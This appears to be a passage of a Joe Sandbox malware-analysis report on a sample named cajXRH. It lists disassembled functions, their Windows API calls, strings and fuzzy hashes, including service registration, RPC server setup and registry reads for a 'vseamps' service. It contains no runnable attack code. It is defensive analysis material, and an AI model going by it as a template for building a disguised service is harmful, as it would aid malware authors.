Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
String ID:
API String ID: 2707001247-0
Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708

Function 00007FFE13204804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE13204861

Part of subcall function 00007FFE13206BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FFE13206C07
Part of subcall function 00007FFE13206BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE13206C2C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE13204939
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE13204B87
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE13204C94

Strings

csm, xrefs: 00007FFE1320495C
csm, xrefs: 00007FFE1320487B
csm, xrefs: 00007FFE132048E2

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction ID: 5b7ad0c49c38066b794ca11de7a16eb3eba56c9870332f09a70d27c989218f90
Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction Fuzzy Hash: 6CD17232908B458EEB20EF6694403AD77A0FBA57A8F104175DE8D77B65CF38E499CB00

Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014000169E
HeapFree.KERNEL32 ref: 00000001400016B0
GetProcessHeap.KERNEL32 ref: 00000001400016C0
HeapFree.KERNEL32 ref: 00000001400016D2
GetProcessHeap.KERNEL32 ref: 00000001400016E2
HeapFree.KERNEL32 ref: 00000001400016F4
GetProcessHeap.KERNEL32 ref: 0000000140001704
HeapFree.KERNEL32 ref: 0000000140001716
GetProcessHeap.KERNEL32 ref: 0000000140001726
HeapFree.KERNEL32 ref: 0000000140001738

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601

Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014001371E
HeapFree.KERNEL32 ref: 0000000140013730
GetProcessHeap.KERNEL32 ref: 0000000140013740
HeapFree.KERNEL32 ref: 0000000140013752
GetProcessHeap.KERNEL32 ref: 0000000140013762
HeapFree.KERNEL32 ref: 0000000140013774
GetProcessHeap.KERNEL32 ref: 0000000140013784
HeapFree.KERNEL32 ref: 0000000140013796
GetProcessHeap.KERNEL32 ref: 00000001400137A6
HeapFree.KERNEL32 ref: 00000001400137B8

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601

Function 00007FFE1320B86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FFE1320B9E8
GetProcAddress.KERNEL32 ref: 00007FFE1320B9F4

Strings

api-ms-, xrefs: 00007FFE1320B932
ext-ms-, xrefs: 00007FFE1320B945

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction ID: f51b02e799573f56cd67867075af53494a7c37387b294582f87bf5fc47a8d0cb
Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction Fuzzy Hash: 5441E321B19E0289FA25EF17A9106BE2391BFA5BB0F084575DD4D777A4DE3CE409C740

Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 0000000140002A3C
RegQueryValueExW.ADVAPI32 ref: 0000000140002A76
RegCloseKey.ADVAPI32 ref: 0000000140002A96
EnterCriticalSection.KERNEL32 ref: 0000000140002AAB
LeaveCriticalSection.KERNEL32 ref: 0000000140002B31

Strings

SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002A0D
action, xrefs: 0000000140002A52

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 1119674940-1966266597
Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00

Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004BE7
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004BF6
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C04
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C3E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C4D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C5B
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C8E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C9D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004CAB

GetComputerNameW.KERNEL32 ref: 0000000140001991
lstrlenW.KERNEL32 ref: 000000014000199C
GetProcessHeap.KERNEL32 ref: 00000001400019AB
HeapAlloc.KERNEL32 ref: 00000001400019B9

Strings

Security=impersonation static true, xrefs: 0000000140001952
ampIfEp, xrefs: 000000014000195E
ncalrpc, xrefs: 000000014000196D

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen$ComputerName
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3702919091-996641649
Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00

Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700

Function 00007FFE1320712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFE132072EB,?,?,?,00007FFE13203EC0,?,?,?,?,00007FFE13203CFD), ref: 00007FFE132071B1
GetLastError.KERNEL32(?,?,?,00007FFE132072EB,?,?,?,00007FFE13203EC0,?,?,?,?,00007FFE13203CFD), ref: 00007FFE132071BF
LoadLibraryExW.KERNEL32(?,?,?,00007FFE132072EB,?,?,?,00007FFE13203EC0,?,?,?,?,00007FFE13203CFD), ref: 00007FFE132071E9
FreeLibrary.KERNEL32(?,?,?,00007FFE132072EB,?,?,?,00007FFE13203EC0,?,?,?,?,00007FFE13203CFD), ref: 00007FFE13207257
GetProcAddress.KERNEL32(?,?,?,00007FFE132072EB,?,?,?,00007FFE13203EC0,?,?,?,?,00007FFE13203CFD), ref: 00007FFE13207263

Strings

api-ms-, xrefs: 00007FFE132071D1

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction ID: b1b605393add6a819cde189612f1031f811afda2d1040e313fea657fd63f7cf2
Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction Fuzzy Hash: 4031D221B1AF429DFE15AB0BA4005BD6394BFA9B70F590674ED1D273A1EE3CE449C300

Function 00007FFE13209444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE13209453
FlsGetValue.KERNEL32 ref: 00007FFE13209468
FlsSetValue.KERNEL32 ref: 00007FFE13209489
FlsSetValue.KERNEL32 ref: 00007FFE132094B6
FlsSetValue.KERNEL32 ref: 00007FFE132094C7
FlsSetValue.KERNEL32 ref: 00007FFE132094D8
SetLastError.KERNEL32 ref: 00007FFE132094F3

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction ID: 9c13dd64791026cb2d38728fdcee1a7ee9bdb1a945891c6419964660a8493107
Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction Fuzzy Hash: 77212C20B0CE824DFA65B723565113E55529FE4BB0F1447B4E93F36AF6DE6CE449C200

Function 00007FFE13210100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFE13210131
GetLastError.KERNEL32 ref: 00007FFE1321013D
CloseHandle.KERNEL32 ref: 00007FFE13210155
CreateFileW.KERNEL32 ref: 00007FFE13210180
WriteConsoleW.KERNEL32 ref: 00007FFE1321019F

Strings

CONOUT$, xrefs: 00007FFE13210161

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction ID: d46568586f317830685a8f2b42987ef54e05f9a52d9b9c51f603404c8beb9f82
Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction Fuzzy Hash: 24117C21B18F418AE750AB57A94432972A0BBE9FF4F004274EA5EA7BA5CF3CD544C744

Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
CreateEventW.KERNEL32 ref: 00000001400012C0

Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3

SetServiceStatus.ADVAPI32 ref: 0000000140001302
WaitForSingleObject.KERNEL32 ref: 0000000140001312

Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

SetServiceStatus.ADVAPI32 ref: 000000014000134B

Strings

vseamps, xrefs: 000000014000127B

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
String ID: vseamps
API String ID: 3197017603-3944098904
Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00

Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON

Download Yara Rule

APIs

sprintf_s.LIBCMTD ref: 0000000140001233
MessageBoxW.USER32 ref: 0000000140001249

Strings

usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy, xrefs: 000000014000121D
Help, xrefs: 0000000140001238
10:52:57, xrefs: 000000014000120F
Jul 5 2019, xrefs: 0000000140001216

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Messagesprintf_s
String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
API String ID: 2642950106-3610746849
Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700

Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002666
HeapFree.KERNEL32 ref: 0000000140002674
GetProcessHeap.KERNEL32 ref: 0000000140002683
HeapFree.KERNEL32 ref: 0000000140002691
GetProcessHeap.KERNEL32 ref: 00000001400026A0
HeapFree.KERNEL32 ref: 00000001400026AE
GetProcessHeap.KERNEL32 ref: 00000001400026BD
HeapFree.KERNEL32 ref: 00000001400026CB

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700

Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002986
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002994
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029A3
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029B1
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029C0
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029CE
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029DD
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029EB

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
